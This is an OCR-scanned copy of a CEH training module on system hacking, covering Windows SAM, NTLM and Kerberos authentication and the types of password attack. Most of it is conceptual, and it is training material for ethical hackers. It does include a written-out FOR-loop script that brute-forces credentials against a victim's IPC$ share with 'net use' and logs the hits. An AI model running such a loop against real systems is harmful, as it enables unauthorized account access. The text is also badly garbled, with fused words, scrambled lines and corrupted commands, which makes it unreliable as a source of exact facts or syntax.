system collectedabouta targeti n thefootprinting,
basedo n theinformation scanning,
andvulnerability
enumeration, analysis
phases.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Certified
| Ethical Hacker

Module06:
Hacking
System
 Module Objectives

Technaues
Understanding oan Acces othe Sytem

LUndestanding
o
Techniques
CreatandMaltin Remote
Accestothe Sytem

Oferet
System
Understanding
Hacking Countermssres

Module Objectives
Systemhacking is one of the most important, theultimategoalof an attacker.
andsometimes,
The attacker acquires information through techniques
such as footprinting,scanning,
enumeration,andvulnerability
analysisand then uses thisinformation
to hackthe target
Thismodulewill focuson the toolsand techniques
system. usedbyan attackerto hackthe
targetsystem,
with an overview of the hacking
The modulebegins methodology.
Next,it discusses
in detail
the various hacking suchas gainingandmaintaining
stages, access andclearing
logs.
Atthe endof this
=
module,
willable
you
theCertified
Describe
the
following:
be
Ethical
to
Hackerhacking
do
methodology
=
Explain
thedifferenttechniquesto gainaccessto a system
=
Apply
privilege techniques
escalation
Explain
differenttechniques
to gainandmaintain remote access to a system
Describe
types
ofrootkits
different
steganography
Explain andsteganalysis
techniques
Apply
differenttechniques
to hidetheevidenceof compromise
Apply
v arious systemhacking
countermeasures

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Gaining
Recess Maintaining
Accoss

8 comm
e
System
Hacking
Concepts
An attackerengagesin systemhacking attemptsusing informationcollected in earlier
footprinting, and vulnerability
scanning, enumeration, analysisphases.The following is an
ofthesephases
overview andtheinformationcollecteds o far.
Wehavealready the following
discussed in our previousmodules:

Footprinting
Module: Footprinting
is the processof accumulatingdataabout a specific
networkenvironment. In the footprinting
phase, theattackercreates a profileof the
andobtainsinformationsuchas its IP addressrange,namespace,
targetorganization
andemployees.
Footprintingfacilitates
theprocessof system hacking
byrevealing
its vulnerabilities.
For
example, the organization'swebsite may provide employee bios or a personnel
directory,whichthehacker can use for socialengineering Conducting
purposes. a Whois
query on the web can provideinformationaboutthe associated networksanddomain
namesrelated
to a specific
organization.
Scanning Module: Scanning is a procedureusedforidentifyingactive hosts,
openports,
and unnecessaryservices enabledon particular hosts.Attackersuse different typesof
scanningmethods forhostdiscovery, portandservice discovery,operating system (0S)
discovery,and evading endpoint securitydevicessuchas intrusion detectionsystems
(IDSs)andfirewalls.Thesetechniques helpattackersidentify possible vulnerabilities.
Scanning procedures suchas portscanning and ping sweeps return informationabout
the services offeredbythe live hoststhat are active on the Internet,and their IP
addresses,

ical andCountermensores
Mackin ©by E-Comel
Copyright
EnumerationModule:Enumerationis a methodof intrusive probing, through which
attackersgather informationsuchas network user lists,routingtables, flaws,
security
andSimple
andshared
NetworkManagement
(SNMP)
Protocol
data.
is
the attackerranges over the targetterritoryto glean
users,groups,applications,andbanners.
This of significance,
because
informationaboutthe network,

Enumeration involvesmaking active connectionsto the targetsystemor subjecting

it to
direct queries. Normally, an alert and secure system logssuchattempts. Often,
the
information gathered, suchas a ONSaddress, available;
is publicly however, its possible
that the attackermight stumbleupon a remote IPCshare, suchas IPCSi n Windows,
that
can be probed with 2 null session, thereby allowingsharesand accounts to be
enumerated,
Vulnerability
Analysis
Module: Vulnerability
assessmentis an examination of the ability
of a systemor application,
including
its current securityproceduresand controls, to
withstandassault.It recognizes,
measures, and classifies vulnerabilitiesi n
security a
computersystem,network, andcommunication channels.
Attackersperform vulnerability
analysisto identify
securityloopholes i n the target
organization's network,communication infrastructure,
andend systems. Theidentified
vulnerabilitiesare usedbythe attackersto performfurther exploitation
on that target
network.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CEH Hacking
Methodology
(CHM)
Y= rootprinting System
Hacking
(ining
Recess
Y — sansing

Y= Emmeration

| Velnerabity
ar
Clearing
Loge
CEHHacking (CHM)
Methodology
Attackersfollow a certain methodology They
to hacka system. first obtaininformationduring
thefootprinting,scanning, enumeration,andvulnerability
analysisphases, whichtheythenuse
to exploit
the targetsystem.
The figure between stepsi n the CEH hacking
showsthe steps and flow mechanisms

methodology
(CHM).
VY reotprinting System
Hacking
Cenching
Passwords

Y
Escalating
Privileges
Access
‘Maintaining
Executing
Applications
isingles
‘Vulnerability
Analysis Clearing
Loge
Tacks
Covering

Figure6.1:
CEHhacking
methodology

Module
Page6 S48
tical
Making
and by CountermensoresCopyright©
Comet
Thereare fourstepsin theCHM:

Theprevious phases of hacking, includingfootprinting

and reconnaissance,scanning,
andvulnerability
‘enumeration, assessment,helpattackers
to identify loopholes
security
and vulnerabilitiesthat exist i n the targetorganizational
IT assets.Attackersuse this
alongwith techniques
information, suchas cracking passwords and exploiting
vulnerabilitiessuchas buffer overflows,
access to the targetorganizational
to gain
system.
Password involvesgainingaccessto low-privileged
cracking user accounts bycracking
passwords using techniques such as brute-forcing,
password guessing, and social
engineering,Attackers exploit theidentified suchas bufferoverflows,
vulnerabilities, to
gain root-levelaccess to the targetsystem.

Aftergainingaccess,attackers
thenescalatetheirprivileges
to administrative levels,
to
perform a protectedoperation.Attackersexploit
vulnerabilitiesthat exist i n OSsand
softwareapplications privileges.
to escalate

‘Maintaining
Access
Aftersuccessfully
gainingaccessandescalating
privileges
to the targetsystem,
attackers
ensure
high
executing
files.
that levelsof access are
andstealing,
applications
malicious
maintainedto
hiding,
perform
maliciousactivities suchas
with sensitive system
or tampering

Clearing
Logs
To maintain futuresystem access,attackersattemptto avoidrecognition bylegitimate
systemusers. To remain undetected, attackerswipe out the entries corresponding
to
theiractivities in the systemlogs,
thusavoiding detectionbyusers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 System Goals
Hacking
Hacking Stage

bypat
acest ‘Technique
contralto /Exploit
Goat Used

@Gsining soca
Te gla
Access ‘roltaton,
engineering
©Excataing
Priviteges

©Executing
Applications eons
@Hising
rites

©Covering
Tacks

System Goals
Hacking
Every
criminalhasa certain goalthat theyintend to achieve.Likewise, attackerscan have
certain goalsfor performing systemattacks.Thefollowingare some examples of thegoalsof
system attackers.Thefollowingdiagram showsthesegoals at different hacking
stagesandthe
to them,
used achieve
techniques
Hacking-Stage Goat ‘Technique/Exploit
Used

@Gaining access Bowes acon onieb wah

©
Escalating
Privileges
Executing
©
Applications
@Hiding Fies

©Covering
Tracks Geming
oes

=
GainingAccess
In systemhacking,
the attackerfirst tries
to gain access to a targetsystemusing
informationobtainedand loopholes
found i n the access control mechanism
of the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 theycan freely
i n gainingaccessto the system,
system.Oncethe attackersucceeds
various maliciousactivities suchas stealing
perform sensitive data,implementing
a
snifferto capturenetworktraffic,andinfecting
thesystemwithmalware.
Theattacker
canthen use techniques suchas password cracking,
vulnerability
exploitation,
andsocial
engineeringtacticsto gainaccessto the targetsystem.
Escalating
Privileges
After gaining access to a systemusing a low-privileged normal user account, the
attackermaythentryto increase theiradministrator privileges to performprotected
systemoperations, so that theycan proceedto the next level of the systemhacking
phase, which is the execution of applications.The attackerexploits known system
vulnerabilitiesto escalateuser privileges.
Executing
Applications
the attackerhasadministratorprivileges,
‘Once theycan attempt to installmalicious
programssuch as Trojans, backdoors,rootkits,and keyloggers, whichgrantthem
remote system access andenablethemto remotely execute maliciouscodes.Installing
rootkitsallowstheattackerto gainaccessat the OSlevelto perform malicious activities.
To maintain access for later use,theymay even installbackdoors.
Hiding
Files
Attackers use rootkitsandsteganography techniques to attemptto hidethe malicious
filestheyinstallo n the system,
andthustheir activities,
Covering
Tracks
To remain undetected, forthe attackers
it is important to erase fromthe systemall
evidenceof security
compromise. To achievethis,theymightmodify or delete logs
in
the systemusing certain log-wipingutilities,
thus removingall evidenceof their
presence.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

1 System
Hacking
Concepts Escalating
Privileges

Maintaining
Accoss

8 ame
e
GainingAccess
Asdiscussed CHMinvolves
earlier, various stepsattackers
followto hacksystems. Thefollowing
sections discuss
thesestepsi n greaterdetail. Thefirst step,whichis the gaining of access,
involvesthe use of various techniques that attackers
employ to gain access to the target
system.These techniques include cracking passwords,exploitingbuffer overflows, and
vulnerabilities.
identifying

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MicrosoftAuthentication

Recounts
Manager
Security (SAMDatabase

databace
in domain,
are lear
Passwords never toed in
shed,a ndhe results
are sored
inthe SAM
txt and

‘The
NTLM protocltyes ar
authentication as fllows:NTUM

ferent hashing
method

Kerberoswhich
Xerheroe
its
provides
Rathentiaion

Microsofthasupgraded default
authentication
protacolto
authentication
a stonger forclnt/sever
10
#8Windows
Cracking
Passwords
Microsoft Authentication
users login
‘When to a Windowscomputer,a series of steps is performed for user
authentication.TheWindowsOSauthenticatesi ts users with the helpof three mechanisms
(protocols)
provided
byMicrosoft
=
Security (SAM)
AccountsManager Database
Windowsuses the Security AccountsManager (SAM) databaseor Active Directory
Database to manageuser accountsand passwords i n hashed format (aone-wayhash).
Thesystem doesnot store the passwordsin plaintext formatbut in a hashedformat,to

andthe Windowskernelobtainsandkeeps
As thisfile consists of a filesystem
an exclusive
this provides
lock,
the
protectthemfromattacks.ThesystemimplementsSAMdatabaseas registry
filesystem a file,
lockon the SAMfile,
some measure of securityfor the
of passwords.
storage
It is not possible
Becausethe system locksthe SAM file with an exclusivefilesystem of
to copythe SAMfile to anotherlocationin the case online attacks.
lock,a user cannot
copyor move it whileWindowsis running.Thelockdoesnot releaseuntil the system
throws a blue screen exception, or the OS hasshut down. However, to makethe
password hashesavailableforofflinebrute-force attacks, attackerscan dumpthe on-
disk contents of the SAM file usingvarious techniques. TheSAM file uses an SYSKEY
function(inWindowsNT 4.0 and later versions) to partiallyencryptthe password
hashes.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Evenifhackersuse subterfuge
techniques to discoverthecontents,theencryptedkeys
with a one-way hashmakeit difficult to hack.In addition,some versions have a
secondarykey,whichmakestheencryption specific
to that copyof theOS.
NTLMAuthentication
NT LAN Manager
(NTLM)
is a default authenticationschemethat performs
authenticationusinga challenge/response Becausei t does not relyon any
strategy.
official protocol
specification, that it workseffectively
there is no guarantee i n every
it has beenusedi n some Windowsinstallations,
situation. Furthermore, whereit
successfullyworked. NTLM authentication consists of two protocols: NTLM
authentication protocol and LAN Manager (LM)authentication protocol.These
protocolsuse different hash methodologies passwords
to store users’ in the SAM
database.
Kerberos
Authentication
Kerberos
is a networkauthenticationprotocol
that provides
strongauthenticationfor
client/server
applications through secret-key cryptography.This protocol
provides
in that boththe server andthe user verify
mutualauthentication, eachother'sidentity.
Messages
sent through
Kerberosprotocol
are protected
againstreplay
attacksand
eavesdropping.
Kerberosemploysthe Key DistributionCenter(KDC), whichis a trustedthird party.This
logically
consists of two distinct parts:an authenticationserver (AS)and a ticket
aranting (TGS).
server Kerberos to provea user's
uses“tickets― identity
Microsofthasupgradedits defaultauthenticationprotocolto Kerberos, whichprovides
authentication
a stronger applications
for client/server than NTLM:

Enternetworkcredentials
Enteryour credentials
to connectto:RO

1 Bemember
my creentals

‘The
password
is
user name or

ox
ncattect

Serenshot ofWindowsauthentication
Figure6:3:

ical andCountermensores
Mackin ©by E-Comel
Copyright
How HashPasswordsAreStoredin WindowsSAM?
WindowsO Ssuse a Security AccountManager
(SAM)databasefile to store user passwords.
The
SAMfileis storedat %SysternRoot%/system32/config/SAM
i n Windows systems,andWindows
underthe HKLM/SAM
mounts it in the registry registryhive. It stores LM or NTLMhashed
passwords.

OEE LM
sword hashung NTA

> miners csc mammorrnnrrre

NTLMsupersedes the LM hash,

password
using
Figure64:Storing
a user

whichis susceptible
LM/NTLM
to cracking.
hash
Newversions of Windowsstill
supportLM hashesfor backwardcompatibility; however, Vista and later Windowsversions
disableLMhashesbydefault.
in during
of
TheLM hashis blank the newer versions Windows.
the optionto remove LM hashesenables an additional check
operationsbutdoesnot immediately
Selecting
passwordchange
clearLM hashvaluesfromtheSAM.TheSAMfilestores a
“dummy―
valuei n its database,
whichbearsno relationship to the user'sactualpasswordandis
the sameforall user accounts.It is not possible
to calculate
LM hashes forpasswords exceeding
14 charactersi n length.Thus, the LM hashvalue is set to a “dummy―
valuewhena user or
administratorsetsa password ofmore than14characters.

6
Module S55
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 c: \windows\system32\config\SAM

v v
Figure65:SAMfle
Note: LM hashes
a re disabled LM is blankin those
i n WindowsVistaand laterWindowsOSs;
systems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NTLMAuthenticationProcess

Domain Controller
‘Windows

Shiela Daman cree std

nao wee nesteoats bas

Se
e i pasa
gs ma et pet bast pa

NTLM AuthenticationProcess
authentication:LM,NTLMv1,and
NTLM includesthree methodsof challenge-response
NTUMv2, all ofwhichuse the same technique Theonlydifference
forauthentication. between
them is the level of encryption.In NTLMauthentication,
the clientand server negotiate
an
authentication protocol. This is accomplished
through
the Microsoft-negotiatedSecurity
Provider(SSP).
Support

‘Windows
DomainController

‘amped roqen
aOC |ieoruam
he
espe
ve
le °
66; NTLMauthentication
Figure process
Thefollowing stepsdemonstrate
theprocessandthe flowof clientauthenticationto a domain
controllerusingany NTLMprotocol:
+
the username andpassword
Theclienttypes into the logon
window.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Windowsruns the password througha hashalgorithm
andgenerates
a hashforthe
password
that is enteredi n the logon
window.
Theclient computer
sendsa loginrequestalong
with a domainname to the domain
controller.
Thedomaincontrollergeneratesa 16-byte randomcharacterstringcalleda “nonce,―

to
whichit sends the clientcomputer.
Theclientcomputer encryptsthe nonce with a hashof the user password
andsendsit
backto the domaincontroller.
Thedomaincontroller retrieves the hashof theuser passwordfromthe SAManduses it
to encrypt the nonce. Thedomaincontrollerthen compares the encrypted valuewith
the valuereceivedfromthe client.A matching valueauthenticatesthe client,
andthe
logon i s successful.
Note:Microsofthasupgraded its defaultauthenticationprotocol
to Kerberos,
whichprovides
a
authentication
stronger for client/serverapplications
thanNTLM,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 KerberosAuthentication
Keyistibution
Center
KOC)
i abn et

‘AlcanServer

KerberosAuthentication
Kerberosis a network authenticationprotocol that providesstrongauthenticationfor
client/serverapplications throughsecret-key cryptography, which provides mutual
authentication.Both the server and the user verifyeachother's identity.
Messagessent
throughthis protocol
are protected replay
against attacksandeavesdropping,
KeyDistribution
Center
(KOC)

Ey
Server
‘Aeplcaton

Kerberosemploys
authentication
Figure67:Kerberos
process
the KDC,whicha trustedthird party,and consistsof two logically distinct
parts:a n ASand a TGS.Theauthorizationmechanism of Kerberosprovides the user with a
ticket-granting
ticket (TGT)
that serves post-authentication
for later access to specific
services,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Single
Sign-On
via which the user need not re-enter the password again to access any
authorizedservices. Notably, there is no directcommunication betweenthe application
servers
andthe KOC; the service tickets,even if packed byTGS,reachthe service onlythrough the
who
client
is to them.
willing access

ical andCountermensores
Mackin ©by E-Comel
Copyright
 PasswordCracking

“© cracking
Password
are
techniquesusedto recover passwords
fromcomputer

|G Attackers cracking
use password to gainunauthorized
techniques access
ta vulnerablesystems

|G Mostofthe password
cracking are succesful
techniques because
of weak.
oreasilyguessable
passwords

PasswordCracking
Passwordcracking is the process of recovering passwords from the data transmittedbya
computer
system
administrators
or fromthe datastored
helpa user recover a forgotten
to check for easily
or lost password,
breakable
of a
i n it. Thepurpose cracking
as a preventive
passwords,
password might beto
measure by system
or for use byan attacker to gain
Unauthorized
system access.

Hacking
often begins
with password-cracking
attempts.A password
is a keypiece of
information Consequently,
to accessa system.
necessary most attackersuse password-cracking
techniquesto gain unauthorizedaccess. An attackermay eithercracka password
manuallyby
guessingit or use automated tools andtechniques suchas a dictionaryor a brute-force
method. Most password-cracking techniques are successful becauseof weak or easily
-uessable
passwords.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
of PasswordAttacks
Types CEH
knowledge
| attack
attackerdoesnot needtechnical
‘The to crackthepassword,
henceiisknown
Non-Electronie se non-technical
‘tacks

Theattacker
performs
password cracking

withoutcommunicating
with the authorizing
party

OtnineAttacks
|
Theattacher
system password
copiesthetage’
atadiferent lesion
on his own
lean hentries to crackpasswords

of PasswordAttacks
‘Types
Passwordcrackingone of the crucial stagesof systemhacking.
is Password-cracking
oftenexploit
mechanisms otherwiselegal
means to gain unauthorized
systemaccess,suchas
recoveringa user'sforgotten password. of password
Classification attacksdepends
on the

=
actions,whichare of thefollowing
attacker's
Non-Electronic
four
types:
Attacks:Thisis, for most cases,the attacker's
firstattemptat gaining
targetsystempasswords.
Non-electronic or non-technical
attacksdo not require any
knowledge
technical abouthacking or systemexploitation.
Techniques usedto perform
attacksincludeshouldersurfing,
non-electronic socialengineering, dumpster
diving,
etc.
Active Online Attacks: This is one of the easiest ways to gain unauthorized
systemaccess. Here,the attackercommunicates with the target
administrator-level
machineto gain password access. Techniques
usedto perform active online attacks
include password guessing,dictionaryand brute-forcing
attacks,hash injection,
LLMINR/NBT-NS poisoning, use of Trojans/spyware/keyloggers,
internal monologue
Markov-chain
attacks, Kerberos
attacks, cracking,
password etc.
PassiveOnlineAttacks:A passiveattackis a typeof systemattackthat doesnot leadto
any changesin the system.In this attack,
the attackerdoesnot haveto communicate
with the system,but passively monitor or record the data passingover the
communication channel,to andfromthe system. Thedata are then usedto breakinto
the system.Techniques usedto perform passiveonlineattacksincludewire sniffing,
man-in-the-middleattacks,
replay attacks,
etc.

ical andCountermensores
Mackin ©by E-Comel
Copyright
OfflineAttacks:Offlineattacksreferto password
attacksi n whichan attackertries to
recover cleartextpasswords
froma password hashdump. Offlineattacksare often time-
consuming buthavea highsuccessrate,as thepassword hashes c an bereversed owing
to their smallkeyspace and short length.Attackersuse pre-computed hashesfrom
rainbow tablesto perform
offlineanddistributed
networkattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Non-ElectronicAttacks

Social Surfing
Engineering
Shoulder Dumpster
Diving
|©
a
Convincingpeople
for
to
revealpasswords
© Looking
either
the
user'skeyboardor
©Searching sensitive
inthe user's
information

printer
trash screen whilehe/she
logging
in
is trash-bins,
bins,a ndinfonthe user's
deskfor sticky
notes

0)

Non-ElectronicAttacks
Non-electronic,or non-technical,
attacksdo not require technicalknowledge of methodsof
systemintrusion. Thereare threetypesof non-electronicattacks:
socialengineering,shoulder
surfing,
anddumpster diving.
=
SocialEngineering
In computer security,socialengineeringis used to denote a non-technicaltypeof
inteusionthat exploitshumanbehavior.Typically, it heavily
relieson humaninteraction
and often involvestricking other people into breaking
normalsecurityprocedures. A
socialengineerruns a “con game―to break securityprocedures. For example, an
attackerusingsocialengineeringto breakinto a computer networkmight tryto gainthe
trust of the authorizeduser to accessthe targetnetworkandthen extract information
a run-through
to compromise networksecurity.Socialengineeringis, i n effect, usedto
procureconfidentialinformation bydeceivingor swayingpeople. An attackercan
himself/herself
disguise as a user or system password
administratorto obtainthe user’s
Socialengineersexploit the fact that people,i n general, try to build amicable
relationships
withtheir friendsandcolleagues andtendto be helpful andtrusting.
Another trait of socialengineeringrelieson the inability
of people to keep up with a
culturethat reliesheavilyon information technology.Most people are unaware of the
valueof the informationtheypossess,andas such, onlya handfulcare aboutprotecting
their information. Socialengineerstypically searchdumpsters to acquirevaluable
information.Furthermore,socialengineers find it more challenging to obtain the
combination or a health-club
to a safe, locker,as compared to thecase of a password.
Thebestdefenseis to educate,train,and create awareness aboutthisattackandthe
valueofinformation,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Surfing
Shoulder
Shouldersurfing i s @ technique of stealing passwords byhovering near the legitimate
users and watching them enter their passwords. In this typeof an attack,the attacker
‘observes
the user’skeyboard or the screen as theylogin, and monitors whatthe user
refersto whenentering their password, for example, a n object
on their deskfor written
passwords or mnemonics. However, this attack can be performed onlywhen the
attackeris in closeproximity to the target.
Thisattackcan alsobeperformed
i n thecheckout
linesof grocerystores,forexample,
when a potentialvictim swipesa debit cardand enters the required
PIN (Personal
IdentificationNumber). PIN typically
hasfour digits,
andthisrendersthe attackeasy
to perform.
Dumpster Diving
“Dumpster diving― attackmethodthat employs
is a key significant
failuresi n computer
i n the targetsystem.
security Thesensitive informationthat people crave, protect,and
devotedly secure can be accessed by almost anyone willing to perform garbage
searching. Looking throughthe trash is a type of low-techattack with numerous
implications.
Dumpster diving was quitepopular i n the 1980s.Theterm itselfrefersto the collection
of useful,
general informationfromwaste dumps suchas trashcans,
curbsidecontainers,
and dumpsters. Even today,curious and/ormaliciousattackerssometimes find
discarded mediawithpassword files,manuals, reports, creditcardnumbers,
receipts, or

other
sensitive
Examination
documents.
products dumps help
of waste from can attackersi n gainingunauthorized
access to the targetsystems, and there is ample evidenceto supportthis concept.
Support staffoften dump sensitive informationwithout heeding to who maybeableto
accessit later.Theinformationthusgathered can thenbeusedbyattackersto perform

other
types of attacks,
suchas socialengineering,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Active Online Attacks:Dictionary, and
Brute-Force,
Rule-basedAttack

Dictionary
AttackBrute-Force Attack
Rule-based
Attack

file
@ AdictionaryIs
used
@ Theprogramtries
loadedinto the cracking every combination of
©Thisattackis
theattackergets
‘when

against characters
application
until
that runs
user accounts password
the
is broken
some information
aboutthe password

Active Online Attacks:Password Guessing

Theattackererate list ofallpossible

of less
Frequency
[|passwords
attacks
the collected
through
from information
socialengineering
wayandmanually
or anyother
inputsthemon the
ctin’s
machine to eraek
thepasswords

Keyin each
reine
||tam || fear password,
unt the
correct passwords
discovered

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DefaultPasswords.

\@ Atachers
use default
passwords inthe Istofwordsor tionary that they
present use to perform
password
guesing

PRBcpenset rns

Calin Panewer
p/m
tools o Search Deal

forpoundeodcom

eoopeseors
n/t
ap/feotoosuads a

ntps://efoue-possword
info

Active Online Attacks: Trojans/Spyware/Keyloggers

|©The
attacker
installs
andpasswords
aTojan/Spyware/Keylgger
on thevictim's
machineto collectthevii’ usernames

|G. TheTojan/Spyware/Keylogger
runs inthebackground
andsends
back
redentiasto
ll user the attacker

eo‘Sin OP
sso.

Qe

6
Module 567
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Active Online Attacks: Hash Injection/Pass-the-Hash
(PtH)Attack CEH

to network
hash validate resources

3
heatacher
nda extract logged

Active Online Attacks: LLMNR/NBT-NS

Poisoning

6
Module S62
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 Active Online Attacks:Internal Monologue
Attack

(©.
Axachersperform
‘mode
monologue
an internal attack
where localprocedure
application,
NetNTIMresponse
i n thecontest of thelogged-on
SSX(secur Support
using
callt o theNTLMauthentication
use
Interface
Provider
a from
ivoked oclel
packages
user

Active Online Attacks: Cracking

Kerberos Password
[AS
REP
Reacting
(Cracking
TCT) (Cracking
769) Kesherousting

he
[SRelpsacta nduc
th wer
ia tw tan eer count nd och tet fo ota the posed

6
Module 569
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 ActiveOnline Attacks:PasstheTicketAttack

metheuersin ints ‘MimiAtE

ie skohelpsextracting hashes
passwords,

dsser machineot by
stealing
theSV7TGT

Active Online Attacks

=
Dictionary Attack
In this type of attack, a dictionaryfile is loadedinto a cracking application that runs
against user accounts.Thisdictionary is a text filethat contains severaldictionary words
‘commonly usedas passwords.
find the password.
Theprogramuses every word present
In addition to a standarddictionary,
contain entries with numbersand symbols
i n the dictionary
an attackers’
addedto words(e.g.,
to
dictionaries
“3December!962")
‘Simple
keyboard finger rolls(“qwer0987"), whichmanybelieveto produce randomand
secure passwords, are thusincludedi n sucha dictionary. Dictionary attacksare more
usefulthanbrute-force attacks,
however, theformercannot beperformed in systems
using passphrases,
Thisattackisapplicable
in two situations:
©. In to discoverthe decryption
cryptanalysis, keyfor obtaining the plaintext
from a
ciphertext
© In computer to bypass
security, authenticationandaccess the controlmechanismof
byguessingpasswords
the computer
to improvethesuccessofa dictionary
‘Methods attack:
© Useof severaldifferent dictionaries,
suchas technicaland foreign
dictionaries,
whichincreases the numberof possibilities
Useof stringmanipulation with the dictionary
along (e.g,i the dictionary
contains
the word “system,―
stringmanipulationcreates anagrams like “metsys,―
among
others)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Brute-Force
Attack
Ina brute-forceattack, attackerstryeverycombinationof characters until the password
is broken.Cryptographic algorithms
must be sufficiently
hardenedto preventa brute.
forceattack, whichIs definedbythe RSAas follows:“Exhaustive key-search, or brute-
forcesearch, is the basictechnique everypossible
for trying keyi n turn until the correct
keyis identified.―
brute-force
‘A attackis whensomeone tries to produce everysingle encryption keyfor
data to detectthe neededinformation.Eventoday, onlythosewith enough processing
this
type
powercouldsuccessfully
Cryptanalysis
perform of attack,
is @ brute-forceattack on encryptionthat employs a searchof the
keyspace.
In otherwords, all possible
testing keysis one of the attempts
to recover the

plaintext
is
no
aparticular
ciphertext.
usedto produce
ofbreaking
the ofacipher
cipher. oris Thedetection key plaintext
fasterthan a brute-forceattackis one way A
methodexiststo break it otherthan a brute-forceattack.In general,
that
secure if
all ciphers
are
deficient in mathematicalproof If the user chooseskeys
of security. randomly or
searches randomly, the plaintext
will becomeavailableon averageafterthe system has

‘Some
of
tried half allthe possible
of theconsiderations
keys.
for brute-forceattacksare as follows:
0 Itisa time-consumingprocess
© All passwordswill eventually
befound
Rule-based
Attack
use this typeof attackwhen theyobtainsome information
‘Attackers aboutthe
password.
This is a more powerful
attack than dictionary
and brute-forceattacks
because
thecrackerknowsthe password type.Forexample,
if theattackerknowsthat
the password number,he/she
contains a two- or three-digit can use some specific
techniques
Byobtaining
to
extract the password
quickly.
usefulinformation,suchas the methodi n whichnumbersand/or special
characters havebeenused,and password length,attackersc an minimize the time
requiredto crackthe passwordandthereforeenhancethe cracking tool.Thistechnique
involvesbruteforce,a dictionary,
andsyllableattacks.
Foronline password-crackingattacks,
an attackerwill sometimesuse a combination of
bothbruteforceanda dictionary.
Thiscombination of hybrid
fallsinto the categories
andsyllable
password-cracking
attacks.
© Hybrid
Attack
Thistypeof attackdepends on the dictionary attack.Often, peoplechange their
passwords merely byadding some numbers to their old passwords.
In this case,the
programwouldaddsome numbersandsymbols to the wordsfromthe dictionary to
tryto crackthe password. Forexample, iftheold password is “system,―
thenthereis
a chance thatthe person will change it to “system―
or “system2.―

ical andCountermensores
Mackin ©by E-Comel
Copyright
©.
SyllableAttack
cracking
technique
Hackersuse this when passwords are not known words.
‘Attackers
ofthem,
combinations andmethods
use the dictionary other to crackthem,as well as all possible

Guessing
Password
Password technique
guessingi s a password-cracking that involves to logon
attempting
to the targetsystem with differentpasswords manually. Guessingis the key
elementof
manualpassword cracking.Theattackercreates a listofall possible
passwords fromthe
informationcollectedthrough socialengineering or any other methodand tries them
manually on thevictim’s
machine to crackthepasswords.
Thefollowing
are the stepsinvolvedin password
guessing:

a
Find valid user
Createa listof possible
passwords
Rankpasswords
from high
to low probability
©. Keyi n eachpassword,
untilthe correct password
is discovered
Hackerscan crackpasswords manually or by usingautomatedtools,methods, and
algorithms.
Theycan also automate password cracking usinga simpleFOR loop,or
create a scriptfile that tries each password i n a list. These techniques
are still
considered
‘Manual
manualcracking,
Password-Cracking
Algorithm
of of
Thefailurerate this type attack is high.

form,thisalgorithm
In its simplest can automate password
guessingusinga simple
FOR
loop.
In the example
that follows,
an attackercreates a simple
text file with usernames
andpasswords
anditerates themusingtheFORloop.
Themain FORloopcan extract the usernamesand passwords fromthe text file,which
serves as a dictionaryas it iterates through
every line:
[file: credentials. txt]
adninistrator
adninistrator password
administrator administrator
[ete]
Typethe followingcommands to access the text file froma directory:
e:\>FOR/F "tokens=1,2*" 4i in (credentials. txt)*
More? do net use \\victim.com\IPC$ %}/u:victim.com\si*
More? 2>>nu1*
More? G6 echo Stimet tdatet >> outfile. txt―
More? && echo \\victim.com acct: $i pass: ¢)>> outfile.ext
c:\ptype outfile.txt
ical andCountermensores
Mackin ©by E-Comel
Copyright
Theoutfile.txtfilecontains the correct username and password,
if the username and
password
i n credentials.txt
are correct. An attackercan establishan open session with
thevictim server usinghis/her
system,
DefaultPasswords
Default passwords are those supplied bymanufacturerswith new equipment (eg.,
switches,hubs, routers). Usually,default passwords provided bythe manufacturers of
password-protected devicesallowthe user to accessthedeviceduring the initial setup
andthen change the password. However, often an administratorwill ether forget to set
the new password or ignorethe password-change recommendation andcontinue using
the original
password, Attackerscan exploitthis lapseandfind the defaultpassword for
the targetdevicefrommanufacturer websitesor usingonlinetools thatshowdefault
passwords to access the targetdevicesuccessfully. Attackersuse default passwords in
thelistofwordsor dictionary thattheyuse to perform password-guessing attacks.
Thefollowing are someoftheonline toolsto searchdefaultpasswords:
hnttp://open-sez.me
https://www.fortypoundhead.com
httpsi//crt.net
http://uwew.defaultpossword.us
http://defaultpasswords
in

https://wurw.routerpasswords.com
https://defoult-password
info

showing
Figure68:Screenshot
defaut
ical
passwords

andCountermensores
Mackin ©by E-Comel
Copyright
Trojans/Spyware/Keyloggers
{ATrojanis a programthat masksitself as a benign application.
Thesoftwareinitially
appearsto perform a desirableor benign function,but insteadstealsinformationor
harmsthe system. With a Trojan,attackerscan gainremote accessandperform various
limitedbyuser privileges
‘operations on the targetcomputer.
is a typeof malware
‘Spyware that attackers
installo n a computer to secretly
gather
informationabout its users withouttheir knowledge. Spyware hidesitselffromthe user
andcan bedifficultto detect.
A keylogger all user keystrokes
is @programthatrecords withouttheuser'sknowledge.
Keyloggers
shipthe logof user Keystrokes
to an attacker'smachineor hide it in the
machinefor later retrieval.Theattackerthen scrutinizes the logto find
vietim’s
passwords
or otherusefulinformationthat couldcompromisethe system.

attackerinstalls a
‘An Trojan/spyware/keylogger
o n a victim'smachineto collecttheir
usernames and passwords.
Theseprogramsr un i n the background
and sendbackall
user credentials
to the attacker.
For example,a key loggeron a victim’s
computer can reveal
the contents of all user
emails.The following image depicts a scenario describing
how an attacker gains
passwordaccess usinga Trojan/spyware/keylogger.

6
Figure9:Activeonine
